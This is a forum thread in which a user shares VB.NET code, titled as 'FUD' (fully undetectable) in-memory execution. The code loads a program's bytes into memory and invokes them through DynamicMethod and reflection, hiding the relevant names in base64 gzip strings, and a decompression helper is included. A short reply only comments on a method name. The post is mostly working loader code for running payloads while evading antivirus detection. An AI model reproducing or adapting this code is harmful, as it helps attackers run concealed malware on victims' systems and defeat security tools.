Browsing as a guest
Hello! You are currently browsing this thread as a guest, If you would like to reply to this thread, please
or Register


Killpot
FUD Memory Execute, (RunPE ish)
#1
Yo.

Code:
Dim dm = New DynamicMethod("Piratesucksshit", GetType(Object), New Type() {GetType(Byte())})
       Dim gen = dm.GetILGenerator()
       gen.DeclareLocal(GetType(Assembly))
       Dim method1 As MethodInfo = Type.GetType(DecompressString("GgAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                                                  ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJeXzdtvhi/
                                                                  ys/LfNoW1XJ83DT5YlJe/z8YT988GgAAAA==")).GetMethod(DecompressString("BAAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                                                                                                                      ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyKeV9ns/wEj
                                                                                                                                      SzSFBAAAAA=="), BindingFlags.[Static] Or BindingFlags.[Public] Or BindingFlags.NonPublic, Nothing, New Type() {GetType(Byte())}, Nothing)
       gen.Emit(OpCodes.Ldarg_0)
       gen.Emit(OpCodes.[Call], method1)
       gen.Emit(OpCodes.Ret)

    
       Dim LAsm As Assembly = dm.Invoke(Nothing, New Object() {---PROGRAM BYTE ARRAY HERE!---})
           
       
       Dim MetInf As MethodInfo = CallByName(LAsm,DecompressString("CgAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                                                    ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJOl219/bIq
                                                                    lu3/A/jXPsAKAAAA"), CallType.method)          
      
       Dim NObj As Object = CallByName(LAsm,DecompressString("DgAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                                              ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJO6jxr87Nl
                                                              02bLaf7/ACrdUiAOAAAA"), CallType.Method, New Object(){CallByName(MetInf,DecompressString("BAAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                                                                                                                                        ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJeZIv8/wE4
                                                                                                                                                        0RH+BAAAAA=="),CallType.method)})           
    
      CallByName(MetInf,DecompressString("BgAAAB+LCAAAAAAABADtvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHK
                                          ZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyLOlpfV2/z/
                                          Ac1nmQkGAAAA"), CallType.Method, New Object(){NObj, New Object() {New String() {Nothing}}})

And also here's the DecompressString function: 

Code:
Public Function DecompressString(ByVal compressedText As String) As String
       Dim gZipBuffer As Byte() = Convert.FromBase64String(compressedText)
       Using memoryStream = New IO.MemoryStream()
           Dim dataLength As Integer = BitConverter.ToInt32(gZipBuffer, 0)
           memoryStream.Write(gZipBuffer, 4, gZipBuffer.Length - 4)
           Dim buffer = New Byte(dataLength - 1) {}
           memoryStream.Position = 0
           Using gZipStream = New GZipStream(memoryStream, CompressionMode.Decompress)
               gZipStream.Read(buffer, 0, buffer.Length)
           End Using
           Return Encoding.UTF8.GetString(buffer)
       End Using
   End Function
[Image: CMfs1Iz.gif]
Reply
#2
I love the name of the DynamicMethod :P
[Image: QDcxlgI.png?1]
Reply
Browsing as a guest
Hello! You are currently browsing this thread as a guest, If you would like to reply to this thread, please
or Register